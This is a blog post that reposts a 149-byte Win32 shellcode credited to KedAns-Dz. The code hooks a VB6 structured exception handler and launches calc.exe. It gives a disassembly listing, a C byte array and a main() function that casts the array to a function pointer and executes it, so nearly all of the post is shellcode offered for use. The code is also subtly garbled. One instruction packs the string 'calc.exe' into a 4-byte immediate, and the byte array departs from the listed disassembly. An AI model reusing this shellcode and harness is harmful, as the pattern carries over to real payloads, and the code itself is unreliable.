Tag Cloud

CRM 2011 (161) CRM 4.0 (144) C# (116) JScript (109) Plugin (92) Registry (90) Techpedia (77) PyS60 (68) WScript (43) Plugin Message (31) Exploit (27) ShellCode (26) FAQ (22) JavaScript (21) Killer Codes (21) Hax (18) VB 6.0 (17) Commands (16) VBScript (16) Quotes (15) Turbo C++ (13) WMI (13) Security (11) 1337 (10) Tutorials (10) Asp.Net (9) Safe Boot (9) Python (8) Interview Questions (6) video (6) Ajax (5) VC++ (5) WebService (5) Workflow (5) Bat (4) Dorks (4) Sql Server (4) Aptitude (3) Picklist (3) Tweak (3) WCF (3) regex (3) Config (2) LINQ (2) PHP (2) Shell (2) Silverlight (2) TSql (2) flowchart (2) serialize (2) ASHX (1) CRM 4.0 Videos (1) Debug (1) FetchXml (1) GAC (1) General (1) Generics (1) HttpWebRequest (1) InputParameters (1) Lookup (1) Offline Plug-ins (1) OutputParameters (1) Plug-in Constructor (1) Protocol (1) RIA (1) Sharepoint (1) Walkthrough (1) Web.config (1) design patterns (1) generic (1) iframe (1) secure config (1) unsecure config (1) url (1)

Pages

Tuesday, August 09, 2011

VB6_vbaExceptHandler - SEH (calc.exe) ShellCode

# =========[ Sh31LC0d3.C ]=====>

/*

###

# Title : Win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes

# Author : KedAns-Dz

# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com

# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)

# Twitter page : twitter.com/kedans

# platform : Win32

# Target : VB6 ExE Project >*> Command : Shell ("calc.exe")

# Tested on : Windows XP SP3 France

###

*/

// TesT Project >> Compile As Name k3d4n5.exe <<

/*

004018E0 > 55 | PUSH EBP

004018E1 . 8BEC | MOV EBP,ESP

004018E3 . 83EC 0C | SUB ESP,0C

004018E6 . 68 96104000 | PUSH <JMP.&MSVBVM60.__vbaExceptHandler> ; SE handler installation (SEH)

004018EB . 64:A1 00000000 | MOV EAX,DWORD PTR FS:[0]

004018F1 . 50 | PUSH EAX

004018F2 . 64:8925 00000000 | MOV DWORD PTR FS:[0],ESP

004018F9 . 83EC 30 | SUB ESP,30

004018FC . 53 | PUSH EBX

004018FD . 56 | PUSH ESI

004018FE . 57 | PUSH EDI

004018FF . 8965 F4 | MOV DWORD PTR SS:[EBP-C],ESP

00401902 . C745 F8 80104000 | MOV DWORD PTR SS:[EBP-8],k3d4n5.00401080

00401909 . 8B45 08 | MOV EAX,DWORD PTR SS:[EBP+8]

0040190C . 8BC8 | MOV ECX,EAX

0040190E . 83E1 01 | AND ECX,1

00401911 . 894D FC | MOV DWORD PTR SS:[EBP-4],ECX

00401914 . 24 FE | AND AL,0FE

00401916 . 50 | PUSH EAX

00401917 . 8945 08 | MOV DWORD PTR SS:[EBP+8],EAX

0040191A . 8B10 | MOV EDX,DWORD PTR DS:[EAX]

0040191C . FF52 04 | CALL DWORD PTR DS:[EDX+4]

0040191F . 33F6 | XOR ESI,ESI

00401921 . 8D55 CC | LEA EDX,DWORD PTR SS:[EBP-34]

00401924 . 8975 CC | MOV DWORD PTR SS:[EBP-34],ESI

00401927 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]

0040192A . 8975 DC | MOV DWORD PTR SS:[EBP-24],ESI

0040192D . C745 D4 616C632E657865 | MOV DWORD PTR SS:[EBP-2C], calc.exe

00401934 . C745 CC 08000000 | MOV DWORD PTR SS:[EBP-34],8

0040193B . FF15 68104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarDup>] ; MSVBVM60.__vbaVarDup

00401941 . 8D45 DC | LEA EAX,DWORD PTR SS:[EBP-24]

00401944 . 6A 02 | PUSH 2

00401946 . 50 | PUSH EAX

00401947 . FF15 34104000 | CALL DWORD PTR DS:[<&MSVBVM60.#600>] ; MSVBVM60.rtcShell

0040194D . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]

00401950 . DDD8 | FSTP ST

00401952 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar

00401958 . 8975 FC | MOV DWORD PTR SS:[EBP-4],ESI

0040195B . 9B | WAIT

0040195C . 68 6E194000 | PUSH k3d4n5.0040196E

00401961 . EB 0A | JMP SHORT k3d4n5.0040196D

00401963 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]

00401966 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar

0040196C . C3 | RETN

*/

char SEH[] =

"\x55\x8B\xEC\x83\xEC\x0C\x68\x96\x10\x40\x00\x64\xA1\x00\x00\x00\x00\x50\x64"

"\x89\x25\x00\x00\x00\x00\x00\x40\x18\xF9\x83\xEC\x30\x53\x56\x57\x89\x65\xF4"

"\xC7\x45\xF8\x80\x10\x40\x00\x8B\x45\x08\x8B\xC8\x83\xE1\x01\x89\x4D\xFC\x24"

"\xFE\x50\x89\x45\x08\x8B\x10\xFF\x52\x04\x33\xF6\x8D\x55\xCC\x89\x75\xCC\x8D"

"\x4D\xDC\x89\x75\xDC\xC7\x45\xD4\x61\x6C\x63\x2E\x65\x78\x65\xC7\x45\xCC\x08"

"\x00\x00\x00\xFF\x15\x68\x10\x40\x00\x8D\x45\xDC\x6A\x02\x50\xFF\x15\x34\x10"

"\x00\x8D\x4D\xDC\xDD\xD8\xFF\x15\x08\x10\x40\x00\x89\x75\xFC\x9B\x68\x41\x42"

"\x43\x40\x44\xEB\x0A\x8D\x4D\xDC\xFF\x15\x08\x10\x40\x00\xC3";



int main(int argc, char **argv)

{

int (*shellcode)();

shellcode = (int (*)()) SEH;

(int)(*shellcode)();

}

/*

No comments: